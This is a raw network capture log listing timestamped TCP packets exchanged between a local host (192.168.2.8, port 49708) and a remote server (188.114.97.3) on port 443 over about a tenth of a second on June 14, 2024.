Jun 14, 2024 15:15:07.888966084 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889008045 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.889071941 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889085054 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889127970 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.889133930 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889159918 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.889173031 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889175892 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.889182091 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889198065 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889223099 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.889230013 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.889246941 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.889271975 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.890093088 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890105963 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890155077 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.890163898 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890172005 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.890201092 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.890739918 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890753984 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890784979 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890815020 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890819073 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.890827894 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.890844107 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.890877008 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891123056 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891140938 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891191006 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891197920 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891314983 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891331911 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891371965 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891381025 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891422033 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891525030 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891537905 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891588926 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891597033 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891665936 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891680956 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891729116 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891736031 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891772032 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891783953 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891849041 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891855955 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891870975 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891922951 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891938925 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.891988993 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.891997099 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.892220020 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.892231941 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.892292976 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.892302990 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.923288107 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.923315048 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.923365116 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.923376083 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.923429966 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.923461914 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.923475981 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.923511982 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998153925 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998178959 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998308897 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998334885 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998389959 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998403072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998420954 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998481035 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998486996 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998531103 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998652935 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998676062 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998723030 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998728037 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998759985 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998779058 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.998915911 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.998934031 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999002934 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999008894 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999058962 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999145031 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999161959 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999213934 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999218941 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999253035 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999275923 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999381065 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999403000 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999459982 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999465942 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999514103 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999613047 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999634981 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999694109 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999699116 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999737978 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999860048 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999877930 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999931097 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.999936104 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.999984026 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000092983 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000108957 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000166893 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000171900 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000210047 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000344992 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000361919 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000416994 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000422001 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000452995 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000471115 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000617981 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000634909 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000700951 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000706911 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000751972 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000830889 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000869036 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000897884 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000901937 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.000936031 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.000957012 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001068115 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001087904 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001152992 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001157045 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001188040 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001208067 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001277924 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001319885 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001362085 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001367092 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001378059 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001409054 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001539946 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001557112 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001605034 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001609087 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001641035 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001661062 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001786947 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001806021 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001849890 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001854897 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.001884937 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.001908064 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002010107 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002027035 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002087116 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002091885 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002131939 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002234936 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002271891 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002304077 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002310038 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002341032 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002361059 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002470016 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002490997 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002552032 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002557039 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002595901 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002706051 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002726078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002780914 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002785921 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002825975 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.002933979 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002980947 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.002996922 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003000975 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003040075 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003057957 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003179073 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003201962 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003252029 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003256083 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003287077 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003309965 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003417015 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003456116 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003490925 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003494978 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003528118 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003546000 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003676891 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003694057 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003740072 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003746986 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003777027 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003798008 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.003942013 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.003963947 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004019022 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004023075 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004054070 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004070997 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004142046 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004162073 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004214048 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004219055 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004249096 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004272938 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004385948 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004403114 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004458904 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004463911 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004508972 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004642963 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004659891 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004718065 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004723072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004770994 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004903078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004930973 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004962921 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.004967928 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.004997015 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005023003 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005183935 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005202055 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005249023 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005253077 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005283117 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005302906 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005426884 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005444050 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005491018 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005496025 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005527973 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005546093 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005673885 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005717039 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005744934 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005749941 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005784988 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005803108 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005918026 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005939007 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.005983114 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.005987883 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006016970 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006036043 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006191015 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006207943 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006253958 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006258965 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006289005 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006308079 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006436110 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006453037 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006503105 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006508112 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006541014 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006558895 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006673098 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006690025 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006742001 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006746054 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006791115 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006915092 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006937027 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.006978035 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.006983995 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007015944 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007029057 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007172108 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007211924 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007235050 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007240057 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007272959 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007291079 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007426977 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007442951 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007503033 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007508039 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007553101 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007661104 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007677078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007729053 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007734060 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007764101 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007785082 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007900000 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007930040 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.007962942 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.007966995 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008014917 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008050919 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008142948 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008161068 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008208036 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008213043 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008244038 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008265018 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008377075 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008393049 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008455038 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008460045 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008497000 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008514881 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008641005 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008660078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008704901 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008709908 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008739948 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008764982 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008878946 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008898020 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008939028 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008943081 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.008975983 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.008996964 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009116888 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009134054 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009179115 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009183884 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009213924 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009232998 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009355068 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009371042 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009423971 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009428978 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009459972 CEST	49708	443	192.168.2.8	188.114.97.3
